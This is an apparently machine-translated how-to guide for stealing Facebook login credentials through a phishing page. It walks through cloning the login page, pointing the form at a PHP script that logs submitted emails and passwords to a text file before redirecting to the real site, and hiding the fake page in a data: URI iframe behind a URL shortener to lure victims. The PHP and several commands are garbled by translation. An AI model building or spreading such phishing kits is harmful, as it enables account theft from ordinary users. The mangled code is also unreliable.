This document describes how to perform a phishing attack by stealing a facebook login account. The process is very simple. It mainly involves two steps to create a phishing page, which is similar to the phishing page of The phishing URI and other websites. You can check the method when you are new to phishing.
I. Create a phishing page
For example, if you want to steal a facebook's login account, a total of three files are included: index.html, login.php, and password.txt.
Step 1: Create an index.html login page
First, open the https://www.facebook.com page and copy the source code to the index.html file.
Edit the index.html file and find
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &&
Event.__inlineSubmit && Event.__inlineSubmit(this,event)">
Change the value of action
action=login.php?"https://www.facebook.com/login.php?login_attempt=1"
(Login. php is used to steal the login account password)
Put index.html in the web directory. My files are stored in the/Library/WebServer/Documents/facebook directory)
Step 2: Create a script for stealing facebook accounts and passwords login. php
<? Phpheader ('location: https://www.facebook.com '); // jump to the real facebook page $ handle = fopen ("password.txt", ""); // write the postdata submitted on the counterfeit page to the foreach ($ _ POST as $ variable =>$ value) {fwrite ($ handle, $ variable); fwrite ($ handle, "= "); fwrite ($ handle, $ value); fwrite ($ handle, "\ r \ n");} fwrite ($ handle, "===================\ r \ n"); fclose ($ handle); exit;?>
Step 3: Create the password.txt file that receives postdata
dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebookdani-2:facebook leedani$ sudo touch password.txt dani-2:facebook leedani$ sudo chmod a+w password.txt
Step 4: Test
Log on to http: // localhost/facebook/
Enter the email and password, and click Login
Upload password.txt File
dani-2:facebook leedani$ cat password.txt
Check that the email and pass fields are the login accounts and passwords of facebook.
Ii. Create a phishing URI
Generally, Phishing uses iframe to cover the original page with a phishing page. The next operation is to generate a Data: URI with this function and convert the URI to a short address.
Step 1: Generate attack code
Src is the address where you store phishing pages.
<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" frameBorder="0" scrolling="auto">iFrame Failed</iframe
Step 2: Convert the attack code to data: URI
Log on to http://dopiaza.org/tools/datauri/index.php and paste the authorization code,
Corresponding data: URI
Data: text/plain; charset = UTF-8; base64, encoding +
Change data: text/plain in data: URI to data: text/html.
Data: text/html; charset = UTF-8; base64, encoding +
After accessing the modified Data URI, we can see that
Click the facebook icon or the url below (Browse facebook.com) To Go To The facebook fake logon page http: // localhost/facebook/we created in step 1 /.
Step 3: generate data: short address corresponding to URI
Obviously, this URI is too long and may cause suspicion. in the real environment, we can convert short URLs first, such as http://tinyurl.com/just remove this service.
Finally, the victim is tempted to click the URI that will connect to the phishing page to steal the account and password.
Reference: http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/